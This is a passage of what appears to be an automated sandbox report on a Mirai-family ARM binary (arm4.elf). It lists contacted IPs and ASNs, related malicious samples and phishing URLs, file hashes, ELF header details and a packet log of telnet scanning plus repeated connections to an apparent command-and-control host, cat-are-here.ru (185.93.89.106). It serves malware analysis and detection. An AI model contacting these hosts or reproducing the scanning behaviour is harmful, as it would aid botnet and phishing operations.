                            8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                            53.38.26.227
                            unknownGermany
                            31399DAIMLER-ASITIGNGlobalNetworkDEfalse
                            34.165.31.3
                            unknownUnited States
                            2686ATGS-MMD-ASUSfalse
                            160.24.255.58
                            unknownJapan17676GIGAINFRASoftbankBBCorpJPfalse
                            102.30.246.215
                            unknownTunisia
                            5438ATI-TNfalse
                            28.43.37.155
                            unknownUnited States
                            7922COMCAST-7922USfalse
                            162.39.13.215
                            unknownUnited States
                            7029WINDSTREAMUSfalse
                            91.189.91.43
                            unknownUnited Kingdom
                            41231CANONICAL-ASGBfalse
                            91.189.91.42
                            unknownUnited Kingdom
                            41231CANONICAL-ASGBfalse
                            16.77.138.247
                            unknownUnited States
                            unknownunknownfalse
                            163.69.161.84
                            unknownFrance
                            17816CHINA169-GZChinaUnicomIPnetworkChina169Guangdongprovifalse
                            175.114.233.75
                            unknownKorea Republic of
                            9318SKB-ASSKBroadbandCoLtdKRfalse
                            45.109.172.245
                            unknownEgypt
                            37069MOBINILEGfalse
                            121.225.65.36
                            unknownChina
                            4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                            190.222.166.187
                            unknownPeru
                            12252AmericaMovilPeruSACPEfalse
                            175.60.24.197
                            unknownChina
                            9394CTTNETChinaTieTongTelecommunicationsCorporationCNfalse
                            105.62.19.186
                            unknownKenya
                            33771SAFARICOM-LIMITEDKEfalse
                            57.120.199.241
                            unknownBelgium
                            51964ORANGE-BUSINESS-SERVICES-IPSN-ASNFRfalse
                            3.185.109.249
                            unknownUnited States
                            16509AMAZON-02USfalse
                            134.64.22.190
                            unknownUnited States
                            385AFCONC-BLOCK1-ASUSfalse
                            118.163.76.89
                            unknownTaiwan; Republic of China (ROC)
                            3462HINETDataCommunicationBusinessGroupTWfalse
                            85.114.179.192
                            unknownRussian Federation
                            8439AISTTogliattiRussiaRUfalse
                            80.77.205.68
                            unknownMalta
                            15735DATASTREAM-NETMTfalse
                            147.156.231.127
                            unknownSpain
                            766REDIRISRedIRISAutonomousSystemESfalse
                            23.207.79.23
                            unknownUnited States
                            8966ETISALAT-ASPOBox1150DubaiUAEfalse
                            23.185.156.128
                            unknownReserved
                            395852MAYAVIRTUALUSfalse
                            92.103.255.193
                            unknownFrance
                            12670AS-COMPLETELFRfalse
                            73.139.184.123
                            unknownUnited States
                            7922COMCAST-7922USfalse
                            47.200.110.237
                            unknownUnited States
                            5650FRONTIER-FRTRUSfalse
                            82.241.224.181
                            unknownFrance
                            12322PROXADFRfalse
                            37.22.199.62
                            unknownRussian Federation
                            12389ROSTELECOM-ASRUfalse
                            79.163.40.134
                            unknownPoland
                            5617TPNETPLfalse
                            136.112.202.104
                            unknownUnited States
                            15169GOOGLEUSfalse
                            41.87.27.147
                            unknownMalawi
                            36969MTL-ASMWfalse
                            64.191.69.190
                            unknownUnited States
                            53828NITELUSfalse
                            201.73.138.150
                            unknownBrazil
                            4230CLAROSABRfalse
                            88.12.42.142
                            unknownSpain
                            3352TELEFONICA_DE_ESPANAESfalse
                            182.109.211.92
                            unknownChina
                            4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                            185.93.89.106
                            cat-are-here.ruUnited Kingdom
                            200861TS-EMEA-ASNGBfalse
                            140.232.20.133
                            unknownUnited States
                            20115CHARTER-20115USfalse
                            150.171.47.88
                            unknownUnited States
                            8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                            91.57.48.123
                            unknownGermany
                            3320DTAGInternetserviceprovideroperationsDEfalse
                            45.215.74.98
                            unknownZambia
                            37287ZAIN-ZAMBIAZMfalse
                            2.250.184.17
                            unknownSweden
                            3301TELIANET-SWEDENTeliaCompanySEfalse
                            109.202.202.202
                            unknownSwitzerland
                            13030INIT7CHfalse
                            150.130.165.69
                            unknownUnited States
                            19773MOTOROLAUSfalse
                            145.15.146.255
                            unknownNetherlands
                            21286KPN-CORPORATE-MARKETNLfalse
                            28.100.168.250
                            unknownUnited States
                            7922COMCAST-7922USfalse
                            152.232.52.0
                            unknownBrazil
                            7738TelemarNorteLesteSABRfalse
                            128.89.3.116
                            unknownUnited States
                            11488BBN-GWUSfalse
                            47.10.180.5
                            unknownCanada
                            55836RELIANCEJIO-INRelianceJioInfocommLimitedINfalse
                            37.167.173.36
                            unknownFrance
                            51207FREEMFRfalse
                            132.67.217.202
                            unknownIsrael
                            378MACHBA-ASILANILfalse
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            91.189.91.43dlr.mips.elfGet hashmaliciousMiraiBrowse
                              arm6.elfGet hashmaliciousMiraiBrowse
                                rep.m68k.elfGet hashmaliciousMiraiBrowse
                                  na.elfGet hashmaliciousPrometeiBrowse
                                    mips.elfGet hashmaliciousMiraiBrowse
                                      arm7.elfGet hashmaliciousMiraiBrowse
                                        dlr.arm7.elfGet hashmaliciousMiraiBrowse
                                          dlr.arm5.elfGet hashmaliciousUnknownBrowse
                                            na.elfGet hashmaliciousPrometeiBrowse
                                              na.elfGet hashmaliciousPrometeiBrowse
                                                91.189.91.42dlr.mips.elfGet hashmaliciousMiraiBrowse
                                                  arm6.elfGet hashmaliciousMiraiBrowse
                                                    rep.m68k.elfGet hashmaliciousMiraiBrowse
                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                        mips.elfGet hashmaliciousMiraiBrowse
                                                          arm7.elfGet hashmaliciousMiraiBrowse
                                                            dlr.arm7.elfGet hashmaliciousMiraiBrowse
                                                              dlr.arm5.elfGet hashmaliciousUnknownBrowse
                                                                na.elfGet hashmaliciousPrometeiBrowse
                                                                  na.elfGet hashmaliciousPrometeiBrowse
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    cat-are-here.rumips.elfGet hashmaliciousMiraiBrowse
                                                                    • 185.93.89.106
                                                                    arm7.elfGet hashmaliciousMiraiBrowse
                                                                    • 185.93.89.106
                                                                    mips.elfGet hashmaliciousUnknownBrowse
                                                                    • 156.229.232.99
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    DAIMLER-ASITIGNGlobalNetworkDErep.m68k.elfGet hashmaliciousMiraiBrowse
                                                                    • 53.90.244.177
                                                                    botnet.arm5.elfGet hashmaliciousMirai, MoobotBrowse
                                                                    • 53.195.191.195
                                                                    botnet.m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                                    • 53.67.141.35
                                                                    botnet.mips.elfGet hashmaliciousMirai, MoobotBrowse
                                                                    • 53.40.163.48
                                                                    botnet.spc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                    • 53.33.209.117
                                                                    ppc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                    • 53.18.190.12
                                                                    arm7.elfGet hashmaliciousMirai, MoobotBrowse
                                                                    • 53.213.218.99
                                                                    sh4.elfGet hashmaliciousMirai, MoobotBrowse
                                                                    • 53.188.46.13
                                                                    ppc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                    • 53.146.144.69
                                                                    arm.elfGet hashmaliciousMirai, MoobotBrowse
                                                                    • 53.235.249.3
                                                                    MICROSOFT-CORP-MSN-AS-BLOCKUSMc3FDUMnVz.exeGet hashmaliciousAmadey, LummaC Stealer, PureLog Stealer, RedLineBrowse
                                                                    • 20.112.250.133
                                                                    mips.elfGet hashmaliciousMiraiBrowse
                                                                    • 52.238.108.30
                                                                    arm7.elfGet hashmaliciousMiraiBrowse
                                                                    • 40.104.12.84
                                                                    New order A24532848.xlsGet hashmaliciousUnknownBrowse
                                                                    • 13.107.246.45
                                                                    Purchase forecast.xlsGet hashmaliciousUnknownBrowse
                                                                    • 13.107.253.61
                                                                    uDF9cf2ziK.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                    • 52.101.40.26
                                                                    rH3TpuMpZn.exeGet hashmaliciousScreenConnect Tool, Amadey, LummaC Stealer, PureLog Stealer, Quasar, RedLine, VidarBrowse
                                                                    • 52.101.40.26
                                                                    LaudoBombeiro.msiGet hashmaliciousAteraAgentBrowse
                                                                    • 40.113.176.130
                                                                    https://doxnero.sg-azure.top/Get hashmaliciousHTMLPhisherBrowse
                                                                    • 13.107.6.156
                                                                    https://us-west-2.protection.sophos.com/?d=powerbi.com&u=aHR0cHM6Ly9hcHAucG93ZXJiaS5jb20vdmlldz9yPWV5SnJJam9pWWpBNU5UZGtPVEl0T1RVNVpDMDBNVEl3TFRrNFpqVXROR1U1T0dWaU5XVTVNRE01SWl3aWRDSTZJakUxTVdNeE5qWmxMV00zWldFdE5HSTFaQzFoTWpRM0xUTmtNVEF5TlRFelkySXdNeUo5&i=NjAzNTFlYmUxMmQ2N2MzMjNhNzYzZDg0&t=cXRBVTE0Z3RLSGRTdEd4cm1WNzFhUm4wLzUzdXZKYklHYmduYnhYNlpsVT0=&h=5e715a0526a946bcaa614abc851141f0&s=AVNPUEhUT0NFTkNSWVBUSVYXtWfTC_gnxLfx0tqsdWatsuMxIHchoBDvy0tVrFrMxgGet hashmaliciousUnknownBrowse
                                                                    • 20.227.35.58
                                                                    MICROSOFT-CORP-MSN-AS-BLOCKUSMc3FDUMnVz.exeGet hashmaliciousAmadey, LummaC Stealer, PureLog Stealer, RedLineBrowse
                                                                    • 20.112.250.133
                                                                    mips.elfGet hashmaliciousMiraiBrowse
                                                                    • 52.238.108.30
                                                                    arm7.elfGet hashmaliciousMiraiBrowse
                                                                    • 40.104.12.84
                                                                    New order A24532848.xlsGet hashmaliciousUnknownBrowse
                                                                    • 13.107.246.45
                                                                    Purchase forecast.xlsGet hashmaliciousUnknownBrowse
                                                                    • 13.107.253.61
                                                                    uDF9cf2ziK.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                    • 52.101.40.26
                                                                    rH3TpuMpZn.exeGet hashmaliciousScreenConnect Tool, Amadey, LummaC Stealer, PureLog Stealer, Quasar, RedLine, VidarBrowse
                                                                    • 52.101.40.26
                                                                    LaudoBombeiro.msiGet hashmaliciousAteraAgentBrowse
                                                                    • 40.113.176.130
                                                                    https://doxnero.sg-azure.top/Get hashmaliciousHTMLPhisherBrowse
                                                                    • 13.107.6.156
                                                                    https://us-west-2.protection.sophos.com/?d=powerbi.com&u=aHR0cHM6Ly9hcHAucG93ZXJiaS5jb20vdmlldz9yPWV5SnJJam9pWWpBNU5UZGtPVEl0T1RVNVpDMDBNVEl3TFRrNFpqVXROR1U1T0dWaU5XVTVNRE01SWl3aWRDSTZJakUxTVdNeE5qWmxMV00zWldFdE5HSTFaQzFoTWpRM0xUTmtNVEF5TlRFelkySXdNeUo5&i=NjAzNTFlYmUxMmQ2N2MzMjNhNzYzZDg0&t=cXRBVTE0Z3RLSGRTdEd4cm1WNzFhUm4wLzUzdXZKYklHYmduYnhYNlpsVT0=&h=5e715a0526a946bcaa614abc851141f0&s=AVNPUEhUT0NFTkNSWVBUSVYXtWfTC_gnxLfx0tqsdWatsuMxIHchoBDvy0tVrFrMxgGet hashmaliciousUnknownBrowse
                                                                    • 20.227.35.58
                                                                    ATGS-MMD-ASUSmips.elfGet hashmaliciousMiraiBrowse
                                                                    • 32.79.80.242
                                                                    arm7.elfGet hashmaliciousMiraiBrowse
                                                                    • 56.172.19.240
                                                                    botnet.arm.elfGet hashmaliciousMirai, MoobotBrowse
                                                                    • 48.135.128.41
                                                                    http:///sites.google.com/view/drive-u-7-home/Get hashmaliciousUnknownBrowse
                                                                    • 34.8.123.242
                                                                    botnet.arm5.elfGet hashmaliciousMirai, MoobotBrowse
                                                                    • 32.192.28.38
                                                                    botnet.sh4.elfGet hashmaliciousMirai, MoobotBrowse
                                                                    • 34.135.66.122
                                                                    botnet.mpsl.elfGet hashmaliciousMirai, MoobotBrowse
                                                                    • 32.253.101.15
                                                                    .Sarm5.elfGet hashmaliciousMiraiBrowse
                                                                    • 34.151.41.173
                                                                    botnet.m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                                    • 34.152.104.220
                                                                    botnet.arm7.elfGet hashmaliciousMirai, MoobotBrowse
                                                                    • 34.10.158.19
                                                                    No context
                                                                    No context
                                                                    No created / dropped files found
                                                                    File type:ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
                                                                    Entropy (8bit):6.224393392590817
                                                                    TrID:
                                                                    • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                                    File name:arm4.elf
                                                                    File size:96'400 bytes
                                                                    MD5:2e611d06aeb1cc3dac822323b6d17a6c
                                                                    SHA1:93a697b34c5c9d6d60f7bc05b9b0553a618e2ad1
                                                                    SHA256:879f8c06476799fb014da7f4197f72f977dc2e2025d6fd01126c1d1e349f371e
                                                                    SHA512:b4d541309ce1a770c5401e3a3e2f4f96282871e514ed61c17089eebaecb2e9044332f363c3c15215aca0db69da241f5ebd584b43cb47f37fe28468f63375fc91
                                                                    SSDEEP:1536:tAzf9dCevvk7tZGC1eedV59bQ74wVjqrE2SUF+RTFuDOBuMvFtiCKkRZ:tAzfTC1eedxA4wpb2zF1ipLiCKu
                                                                    TLSH:8B933989B8D19E26C5D552BFFA5F82AC373193F4C1DBB207DC146B257B8282B1C6B211
                                                                    File Content Preview:.ELF...a..........(.........4....w......4. ...(......................s...s...............s...s...s.......4..........Q.td..................................-...L."....P..........0@-.\P...0....S.0...P@...0... ....R......0...0...........0... ....R..... 0....S

                                                                    ELF header

                                                                    Class:ELF32
                                                                    Data:2's complement, little endian
                                                                    Version:1 (current)
                                                                    Machine:ARM
                                                                    Version Number:0x1
                                                                    Type:EXEC (Executable file)
                                                                    OS/ABI:ARM - ABI
                                                                    ABI Version:0
                                                                    Entry Point Address:0x8190
                                                                    Flags:0x202
                                                                    ELF Header Size:52
                                                                    Program Header Offset:52
                                                                    Program Header Size:32
                                                                    Number of Program Headers:3
                                                                    Section Header Offset:96000
                                                                    Section Header Size:40
                                                                    Number of Section Headers:10
                                                                    Header String Table Index:9
                                                                    NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                    NULL0x00x00x00x00x0000
                                                                    .initPROGBITS0x80940x940x180x00x6AX004
                                                                    .textPROGBITS0x80b00xb00x143000x00x6AX0016
                                                                    .finiPROGBITS0x1c3b00x143b00x140x00x6AX004
                                                                    .rodataPROGBITS0x1c3c40x143c40x2ff00x00x2A004
                                                                    .ctorsPROGBITS0x273b80x173b80x80x00x3WA004
                                                                    .dtorsPROGBITS0x273c00x173c00x80x00x3WA004
                                                                    .dataPROGBITS0x273cc0x173cc0x2f40x00x3WA004
                                                                    .bssNOBITS0x276c00x176c00x31a00x00x3WA004
                                                                    .shstrtabSTRTAB0x00x176c00x3e0x00x0001
                                                                    TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                    LOAD0x00x80000x80000x173b40x173b46.25260x5R E0x8000.init .text .fini .rodata
                                                                    LOAD0x173b80x273b80x273b80x3080x34a81.74790x6RW 0x8000.ctors .dtors .data .bss
                                                                    GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Feb 10, 2025 20:58:08.393800020 CET3654023192.168.2.2316.77.138.247
                                                                    Feb 10, 2025 20:58:08.398617983 CET233654016.77.138.247192.168.2.23
                                                                    Feb 10, 2025 20:58:08.398677111 CET3654023192.168.2.2316.77.138.247
                                                                    Feb 10, 2025 20:58:08.398736000 CET5979823192.168.2.2388.12.42.142
                                                                    Feb 10, 2025 20:58:08.401926994 CET5513623192.168.2.2313.84.114.117
                                                                    Feb 10, 2025 20:58:08.403489113 CET235979888.12.42.142192.168.2.23
                                                                    Feb 10, 2025 20:58:08.403527975 CET5979823192.168.2.2388.12.42.142
                                                                    Feb 10, 2025 20:58:08.404881001 CET4628023192.168.2.23150.171.47.88
                                                                    Feb 10, 2025 20:58:08.406769991 CET235513613.84.114.117192.168.2.23
                                                                    Feb 10, 2025 20:58:08.406872034 CET5513623192.168.2.2313.84.114.117
                                                                    Feb 10, 2025 20:58:08.407563925 CET5060023192.168.2.23175.114.233.75
                                                                    Feb 10, 2025 20:58:08.409722090 CET2346280150.171.47.88192.168.2.23
                                                                    Feb 10, 2025 20:58:08.409815073 CET4628023192.168.2.23150.171.47.88
                                                                    Feb 10, 2025 20:58:08.411268950 CET3970838241192.168.2.23185.93.89.106
                                                                    Feb 10, 2025 20:58:08.412322998 CET5508023192.168.2.2373.139.184.123
                                                                    Feb 10, 2025 20:58:08.412354946 CET2350600175.114.233.75192.168.2.23
                                                                    Feb 10, 2025 20:58:08.412412882 CET5060023192.168.2.23175.114.233.75
                                                                    Feb 10, 2025 20:58:08.414938927 CET4664023192.168.2.2347.200.110.237
                                                                    Feb 10, 2025 20:58:08.416055918 CET3824139708185.93.89.106192.168.2.23
                                                                    Feb 10, 2025 20:58:08.416105032 CET3970838241192.168.2.23185.93.89.106
                                                                    Feb 10, 2025 20:58:08.417104959 CET235508073.139.184.123192.168.2.23
                                                                    Feb 10, 2025 20:58:08.417148113 CET5508023192.168.2.2373.139.184.123
                                                                    Feb 10, 2025 20:58:08.417752981 CET4900023192.168.2.23182.109.211.92
                                                                    Feb 10, 2025 20:58:08.419729948 CET234664047.200.110.237192.168.2.23
                                                                    Feb 10, 2025 20:58:08.419773102 CET4664023192.168.2.2347.200.110.237
                                                                    Feb 10, 2025 20:58:08.420531034 CET3970838241192.168.2.23185.93.89.106
                                                                    Feb 10, 2025 20:58:08.421681881 CET5740223192.168.2.23163.69.161.84
                                                                    Feb 10, 2025 20:58:08.422533035 CET2349000182.109.211.92192.168.2.23
                                                                    Feb 10, 2025 20:58:08.422575951 CET4900023192.168.2.23182.109.211.92
                                                                    Feb 10, 2025 20:58:08.424863100 CET4846823192.168.2.23201.73.138.150
                                                                    Feb 10, 2025 20:58:08.425362110 CET3824139708185.93.89.106192.168.2.23
                                                                    Feb 10, 2025 20:58:08.425479889 CET3970838241192.168.2.23185.93.89.106
                                                                    Feb 10, 2025 20:58:08.426456928 CET2357402163.69.161.84192.168.2.23
                                                                    Feb 10, 2025 20:58:08.426501036 CET5740223192.168.2.23163.69.161.84
                                                                    Feb 10, 2025 20:58:08.427535057 CET3654423192.168.2.2347.10.180.5
                                                                    Feb 10, 2025 20:58:08.429658890 CET2348468201.73.138.150192.168.2.23
                                                                    Feb 10, 2025 20:58:08.429712057 CET4846823192.168.2.23201.73.138.150
                                                                    Feb 10, 2025 20:58:08.430061102 CET5924623192.168.2.2341.87.27.147
                                                                    Feb 10, 2025 20:58:08.430227995 CET3824139708185.93.89.106192.168.2.23
                                                                    Feb 10, 2025 20:58:08.432332993 CET233654447.10.180.5192.168.2.23
                                                                    Feb 10, 2025 20:58:08.432385921 CET3654423192.168.2.2347.10.180.5
                                                                    Feb 10, 2025 20:58:08.433011055 CET5834623192.168.2.2382.241.224.181
                                                                    Feb 10, 2025 20:58:08.434807062 CET235924641.87.27.147192.168.2.23
                                                                    Feb 10, 2025 20:58:08.434849977 CET5924623192.168.2.2341.87.27.147
                                                                    Feb 10, 2025 20:58:08.435550928 CET4980223192.168.2.2334.165.31.3
                                                                    Feb 10, 2025 20:58:08.437864065 CET235834682.241.224.181192.168.2.23
                                                                    Feb 10, 2025 20:58:08.437901974 CET3391623192.168.2.2392.103.255.193
                                                                    Feb 10, 2025 20:58:08.437947035 CET5834623192.168.2.2382.241.224.181
                                                                    Feb 10, 2025 20:58:08.440275908 CET234980234.165.31.3192.168.2.23
                                                                    Feb 10, 2025 20:58:08.440383911 CET4980223192.168.2.2334.165.31.3
                                                                    Feb 10, 2025 20:58:08.442497969 CET5425223192.168.2.2328.43.37.155
                                                                    Feb 10, 2025 20:58:08.442732096 CET233391692.103.255.193192.168.2.23
                                                                    Feb 10, 2025 20:58:08.442775965 CET3391623192.168.2.2392.103.255.193
                                                                    Feb 10, 2025 20:58:08.445173025 CET5506423192.168.2.2345.215.74.98
                                                                    Feb 10, 2025 20:58:08.447299957 CET235425228.43.37.155192.168.2.23
                                                                    Feb 10, 2025 20:58:08.447355986 CET5425223192.168.2.2328.43.37.155
                                                                    Feb 10, 2025 20:58:08.447561979 CET3607023192.168.2.2380.77.205.68
                                                                    Feb 10, 2025 20:58:08.449982882 CET235506445.215.74.98192.168.2.23
                                                                    Feb 10, 2025 20:58:08.450040102 CET5506423192.168.2.2345.215.74.98
                                                                    Feb 10, 2025 20:58:08.450200081 CET5830823192.168.2.2321.246.80.80
                                                                    Feb 10, 2025 20:58:08.452339888 CET233607080.77.205.68192.168.2.23
                                                                    Feb 10, 2025 20:58:08.452395916 CET3607023192.168.2.2380.77.205.68
                                                                    Feb 10, 2025 20:58:08.453166962 CET6028823192.168.2.2379.163.40.134
                                                                    Feb 10, 2025 20:58:08.455162048 CET235830821.246.80.80192.168.2.23
                                                                    Feb 10, 2025 20:58:08.455220938 CET5830823192.168.2.2321.246.80.80
                                                                    Feb 10, 2025 20:58:08.455703020 CET3518223192.168.2.23102.30.246.215
                                                                    Feb 10, 2025 20:58:08.458273888 CET4342423192.168.2.23118.163.76.89
                                                                    Feb 10, 2025 20:58:08.460917950 CET236028879.163.40.134192.168.2.23
                                                                    Feb 10, 2025 20:58:08.460963011 CET6028823192.168.2.2379.163.40.134
                                                                    Feb 10, 2025 20:58:08.461440086 CET2335182102.30.246.215192.168.2.23
                                                                    Feb 10, 2025 20:58:08.461481094 CET3518223192.168.2.23102.30.246.215
                                                                    Feb 10, 2025 20:58:08.461525917 CET5995823192.168.2.2357.120.199.241
                                                                    Feb 10, 2025 20:58:08.463993073 CET2343424118.163.76.89192.168.2.23
                                                                    Feb 10, 2025 20:58:08.464031935 CET4342423192.168.2.23118.163.76.89
                                                                    Feb 10, 2025 20:58:08.467375994 CET235995857.120.199.241192.168.2.23
                                                                    Feb 10, 2025 20:58:08.467468023 CET5995823192.168.2.2357.120.199.241
                                                                    Feb 10, 2025 20:58:08.483393908 CET3450823192.168.2.2337.167.173.36
                                                                    Feb 10, 2025 20:58:08.489732981 CET233450837.167.173.36192.168.2.23
                                                                    Feb 10, 2025 20:58:08.491338968 CET3450823192.168.2.2337.167.173.36
                                                                    Feb 10, 2025 20:58:08.512968063 CET3987423192.168.2.2337.22.199.62
                                                                    Feb 10, 2025 20:58:08.517940998 CET4523823192.168.2.2391.57.48.123
                                                                    Feb 10, 2025 20:58:08.518769979 CET233987437.22.199.62192.168.2.23
                                                                    Feb 10, 2025 20:58:08.518821001 CET3987423192.168.2.2337.22.199.62
                                                                    Feb 10, 2025 20:58:08.521275043 CET6019823192.168.2.2323.185.156.128
                                                                    Feb 10, 2025 20:58:08.523602962 CET234523891.57.48.123192.168.2.23
                                                                    Feb 10, 2025 20:58:08.523654938 CET4523823192.168.2.2391.57.48.123
                                                                    Feb 10, 2025 20:58:08.524256945 CET3907223192.168.2.23134.64.22.190
                                                                    Feb 10, 2025 20:58:08.526962996 CET236019823.185.156.128192.168.2.23
                                                                    Feb 10, 2025 20:58:08.527012110 CET6019823192.168.2.2323.185.156.128
                                                                    Feb 10, 2025 20:58:08.527105093 CET3478623192.168.2.233.185.109.249
                                                                    Feb 10, 2025 20:58:08.530023098 CET2339072134.64.22.190192.168.2.23
                                                                    Feb 10, 2025 20:58:08.530078888 CET3907223192.168.2.23134.64.22.190
                                                                    Feb 10, 2025 20:58:08.532902956 CET23347863.185.109.249192.168.2.23
                                                                    Feb 10, 2025 20:58:08.533044100 CET3478623192.168.2.233.185.109.249
                                                                    Feb 10, 2025 20:58:08.536761045 CET6076223192.168.2.23152.232.52.0
                                                                    Feb 10, 2025 20:58:08.539988041 CET4207223192.168.2.2364.191.69.190
                                                                    Feb 10, 2025 20:58:08.543188095 CET4738423192.168.2.23140.232.20.133
                                                                    Feb 10, 2025 20:58:08.545871973 CET2360762152.232.52.0192.168.2.23
                                                                    Feb 10, 2025 20:58:08.545927048 CET6076223192.168.2.23152.232.52.0
                                                                    Feb 10, 2025 20:58:08.546416044 CET5549023192.168.2.2316.72.19.8
                                                                    Feb 10, 2025 20:58:08.549066067 CET234207264.191.69.190192.168.2.23
                                                                    Feb 10, 2025 20:58:08.549132109 CET4207223192.168.2.2364.191.69.190
                                                                    Feb 10, 2025 20:58:08.552242994 CET2347384140.232.20.133192.168.2.23
                                                                    Feb 10, 2025 20:58:08.552361965 CET4738423192.168.2.23140.232.20.133
                                                                    Feb 10, 2025 20:58:08.554292917 CET235549016.72.19.8192.168.2.23
                                                                    Feb 10, 2025 20:58:08.557403088 CET5549023192.168.2.2316.72.19.8
                                                                    Feb 10, 2025 20:58:08.626259089 CET3297623192.168.2.23160.24.255.58
                                                                    Feb 10, 2025 20:58:08.634267092 CET2332976160.24.255.58192.168.2.23
                                                                    Feb 10, 2025 20:58:08.634356022 CET3297623192.168.2.23160.24.255.58
                                                                    Feb 10, 2025 20:58:08.649317026 CET4475623192.168.2.23190.222.166.187
                                                                    Feb 10, 2025 20:58:08.654192924 CET2344756190.222.166.187192.168.2.23
                                                                    Feb 10, 2025 20:58:08.654344082 CET4475623192.168.2.23190.222.166.187
                                                                    Feb 10, 2025 20:58:08.658755064 CET5196223192.168.2.2385.114.179.192
                                                                    Feb 10, 2025 20:58:08.663605928 CET235196285.114.179.192192.168.2.23
                                                                    Feb 10, 2025 20:58:08.664077044 CET5196223192.168.2.2385.114.179.192
                                                                    Feb 10, 2025 20:58:08.677973986 CET4053423192.168.2.23145.15.146.255
                                                                    Feb 10, 2025 20:58:08.682827950 CET2340534145.15.146.255192.168.2.23
                                                                    Feb 10, 2025 20:58:08.682894945 CET4053423192.168.2.23145.15.146.255
                                                                    Feb 10, 2025 20:58:08.696499109 CET5095023192.168.2.23162.39.13.215
                                                                    Feb 10, 2025 20:58:08.702645063 CET4015023192.168.2.232.250.184.17
                                                                    Feb 10, 2025 20:58:08.704405069 CET2350950162.39.13.215192.168.2.23
                                                                    Feb 10, 2025 20:58:08.704472065 CET5095023192.168.2.23162.39.13.215
                                                                    Feb 10, 2025 20:58:08.708112001 CET23401502.250.184.17192.168.2.23
                                                                    Feb 10, 2025 20:58:08.709436893 CET4015023192.168.2.232.250.184.17
                                                                    Feb 10, 2025 20:58:08.710591078 CET4344623192.168.2.23147.156.231.127
                                                                    Feb 10, 2025 20:58:08.715965033 CET2343446147.156.231.127192.168.2.23
                                                                    Feb 10, 2025 20:58:08.718157053 CET4344623192.168.2.23147.156.231.127
                                                                    Feb 10, 2025 20:58:08.733412981 CET5474023192.168.2.2328.100.168.250
                                                                    Feb 10, 2025 20:58:08.738854885 CET235474028.100.168.250192.168.2.23
                                                                    Feb 10, 2025 20:58:08.738909960 CET5474023192.168.2.2328.100.168.250
                                                                    Feb 10, 2025 20:58:08.761529922 CET4316423192.168.2.2323.207.79.23
                                                                    Feb 10, 2025 20:58:08.767011881 CET234316423.207.79.23192.168.2.23
                                                                    Feb 10, 2025 20:58:08.767076015 CET4316423192.168.2.2323.207.79.23
                                                                    Feb 10, 2025 20:58:08.769866943 CET3987623192.168.2.23136.112.202.104
                                                                    Feb 10, 2025 20:58:08.774771929 CET2339876136.112.202.104192.168.2.23
                                                                    Feb 10, 2025 20:58:08.774825096 CET3987623192.168.2.23136.112.202.104
                                                                    Feb 10, 2025 20:58:08.775377989 CET4797823192.168.2.23175.60.24.197
                                                                    Feb 10, 2025 20:58:08.780153036 CET2347978175.60.24.197192.168.2.23
                                                                    Feb 10, 2025 20:58:08.782121897 CET4797823192.168.2.23175.60.24.197
                                                                    Feb 10, 2025 20:58:08.782598972 CET5657023192.168.2.2353.38.26.227
                                                                    Feb 10, 2025 20:58:08.787432909 CET235657053.38.26.227192.168.2.23
                                                                    Feb 10, 2025 20:58:08.789091110 CET5657023192.168.2.2353.38.26.227
                                                                    Feb 10, 2025 20:58:08.789479017 CET4716423192.168.2.2345.109.172.245
                                                                    Feb 10, 2025 20:58:08.794251919 CET234716445.109.172.245192.168.2.23
                                                                    Feb 10, 2025 20:58:08.794333935 CET4716423192.168.2.2345.109.172.245
                                                                    Feb 10, 2025 20:58:08.795829058 CET4714423192.168.2.23121.225.65.36
                                                                    Feb 10, 2025 20:58:08.800621033 CET2347144121.225.65.36192.168.2.23
                                                                    Feb 10, 2025 20:58:08.800674915 CET4714423192.168.2.23121.225.65.36
                                                                    Feb 10, 2025 20:58:08.801604986 CET5441023192.168.2.23150.130.165.69
                                                                    Feb 10, 2025 20:58:08.806657076 CET2354410150.130.165.69192.168.2.23
                                                                    Feb 10, 2025 20:58:08.806704998 CET5441023192.168.2.23150.130.165.69
                                                                    Feb 10, 2025 20:58:08.807049990 CET5415423192.168.2.23105.62.19.186
                                                                    Feb 10, 2025 20:58:08.816371918 CET2354154105.62.19.186192.168.2.23
                                                                    Feb 10, 2025 20:58:08.816430092 CET5415423192.168.2.23105.62.19.186
                                                                    Feb 10, 2025 20:58:08.816946983 CET4601423192.168.2.23128.89.3.116
                                                                    Feb 10, 2025 20:58:08.823546886 CET2346014128.89.3.116192.168.2.23
                                                                    Feb 10, 2025 20:58:08.823559046 CET43928443192.168.2.2391.189.91.42
                                                                    Feb 10, 2025 20:58:08.823591948 CET4601423192.168.2.23128.89.3.116
                                                                    Feb 10, 2025 20:58:08.890502930 CET4510423192.168.2.23132.67.217.202
                                                                    Feb 10, 2025 20:58:08.895977974 CET2345104132.67.217.202192.168.2.23
                                                                    Feb 10, 2025 20:58:08.896063089 CET4510423192.168.2.23132.67.217.202
                                                                    Feb 10, 2025 20:58:09.023173094 CET3824139708185.93.89.106192.168.2.23
                                                                    Feb 10, 2025 20:58:09.023318052 CET3970838241192.168.2.23185.93.89.106
                                                                    Feb 10, 2025 20:58:09.023432016 CET3970838241192.168.2.23185.93.89.106
